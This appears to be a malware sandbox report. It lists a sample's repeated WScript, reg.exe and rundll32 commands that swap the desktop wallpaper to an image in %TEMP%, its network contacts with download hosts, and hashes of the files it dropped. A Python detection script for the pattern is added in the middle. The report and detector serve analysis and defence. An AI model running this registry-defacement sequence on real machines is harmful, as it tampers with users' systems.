reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
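Detection logic for the sequence recorded above, added here as a worked example; it is not part of the sandbox report and not code from the sample. It parses reg.exe command lines of the form shown in the process list, tracks writes to the per-user wallpaper values, and pairs them with the rundll32.exe user32.dll,UpdatePerUserSystemParameters call that makes the change take effect (the behaviour the report labels "Sets desktop wallpaper using registry", ATT&CK T1491.001 Internal Defacement). The events are constructed tuples of (image, command line) modeled on the entries above, with two benign entries added as noise; the event shape, the finding format and the helper names are this example's own choices.

```python
"""Flag the reg.exe + rundll32.exe wallpaper swap seen in the process list above."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Per-user keys and values that control the desktop wallpaper (lower-cased).
WALLPAPER_KEYS = {
    r"hkcu\control panel\desktop",
    r"hkcu\software\microsoft\internet explorer\desktop\general",
}
WALLPAPER_VALUES = {"wallpaper", "wallpaperstyle", "tilewallpaper"}
TEMP_PATH_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)
# rundll32 user32.dll,UpdatePerUserSystemParameters re-reads the keys and repaints the desktop.
REFRESH_RE = re.compile(r"user32(?:\.dll)?\s*,\s*updateperusersystemparameters", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


@dataclass
class RegOp:
    action: str            # "add" or "delete"
    key: str               # normalised, lower-case key path
    value: Optional[str]   # /v argument, lower-cased
    data: Optional[str]    # /d argument, original case (a path for "wallpaper")


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted arguments (including "") intact."""
    return [m.group(1) if m.group(1) is not None else m.group(2) for m in TOKEN_RE.finditer(cmdline)]


def parse_reg_command(cmdline: str) -> Optional[RegOp]:
    """Return the registry operation encoded in a reg.exe add/delete command line, else None."""
    tokens = tokenize(cmdline)
    if len(tokens) < 3 or tokens[0].rsplit("\\", 1)[-1].lower() not in ("reg", "reg.exe"):
        return None
    action = tokens[1].lower()
    if action not in ("add", "delete"):
        return None
    key = re.sub(r"^hkey_current_user", "hkcu", tokens[2].lower().strip("\\"))
    value = data = None
    i = 3
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag == "/v" and i + 1 < len(tokens):
            value, i = tokens[i + 1].lower(), i + 2
        elif flag == "/d" and i + 1 < len(tokens):
            data, i = tokens[i + 1], i + 2
        else:
            i += 1
    return RegOp(action, key, value, data)


def _finding(ops: List[RegOp], refreshed: bool) -> dict:
    paths = [op.data for op in ops if op.action == "add" and op.value == "wallpaper" and op.data]
    styles = [op.data for op in ops if op.action == "add" and op.value == "wallpaperstyle" and op.data]
    wallpaper = paths[-1] if paths else None
    return {
        "technique": "T1491.001",
        "wallpaper": wallpaper,
        "style": styles[-1] if styles else None,
        "from_temp": bool(wallpaper and TEMP_PATH_RE.search(wallpaper)),
        "reg_ops": len(ops),
        "refreshed": refreshed,  # True when rundll32 applied the change
    }


def detect_wallpaper_defacement(events: Iterable[Tuple[str, str]]) -> List[dict]:
    """Group wallpaper registry writes with the rundll32 refresh that follows them."""
    findings: List[dict] = []
    pending: List[RegOp] = []
    for image, cmdline in events:
        exe = image.rsplit("\\", 1)[-1].lower()
        if exe == "reg.exe":
            op = parse_reg_command(cmdline)
            if op and op.key in WALLPAPER_KEYS and op.value in WALLPAPER_VALUES:
                pending.append(op)
        elif exe == "rundll32.exe" and REFRESH_RE.search(cmdline) and pending:
            findings.append(_finding(pending, refreshed=True))
            pending = []
    if pending:  # writes never applied: still report them
        findings.append(_finding(pending, refreshed=False))
    return findings


# Constructed sample: one iteration of the cycle from the process list plus two benign entries.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WScript.exe", r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"'),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f'),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f'),
    (r"C:\Windows\system32\reg.exe", r'reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f'),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f'),
    (r"C:\Windows\system32\rundll32.exe", "RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters"),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKCU\Software\Contoso\App" /v LastRun /t REG_SZ /d 2024-08-06 /f'),  # benign
    (r"C:\Windows\system32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),  # benign
]

if __name__ == "__main__":
    for f in detect_wallpaper_defacement(SAMPLE_EVENTS):
        print(f)
```

The four registry writes on their own are what any wallpaper-changing utility does; what makes this worth alerting on is the image path under %TEMP%, the WScript.exe parent, and here the repetition: the same cycle runs dozens of times in the recorded list, so a per-host rate threshold on the finding would also catch it.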

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ddl8.data.hu udp
HU 217.65.97.75:443 ddl8.data.hu tcp
US 8.8.8.8:53 75.97.65.217.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat

MD5 e5097bb73edc13e33242930a46f4e976
SHA1 1e644b0f44a4e1ea3612a3adea61d2a984f06605
SHA256 97041695f1a22009f88d14a0ab45b61f6ef0c7fd962af2e7495de690df27cbe1
SHA512 7581babda9be534dee091cb9d3bbef984ce0d7c11accdf1fcf409d446c156ba56759c24a822b83e9d9c5413702a99733838f6ed16b3d2e3bfe6ad03c5fe44a9e

C:\Users\Admin\AppData\Local\Temp\26921.vbs

MD5 17b8608905bad5079f8ef5d1c8b9aafb
SHA1 65864828c6bc101e9234453e0be83b46868f96e7
SHA256 4d909b6c65777ad719bf85bd5e9de00739b962f2c0bab4a49c0c31fa268e93fc
SHA512 5f2fee37de012f090267c3ad1f4fa2ff5051aa4bf6c5a2a476a4b4e9b1272b16301d3c82d38f33732b767447de8da2ce967a26c1952048c1e8315c7d8e1bfbc1

C:\Users\Admin\AppData\Local\Temp\20725.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\4235.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Temp\salope.exe

MD5 a1ca4bebcd03fafbe2b06a46a694e29a
SHA1 ffc88125007c23ff6711147a12f9bba9c3d197ed
SHA256 c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65
SHA512 6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

C:\Users\Admin\AppData\Local\Temp\9391.vbs

MD5 ed4068f59e84632317fe338a2892ecb1
SHA1 260ca0f384ec0784933794a7aed6fb0ac8aaec23
SHA256 24baf9de71f49028cf6188127dea430347bee63f553225dc93c97db83a4ffeaf
SHA512 93774b5f8e54c16cf65db696613201b88bf64847e8558b8171ec7351e9cdc133a28df6a9f3269add80b8a588761bf9b2c40015cdd5b3e068cee9d069b66be1c5

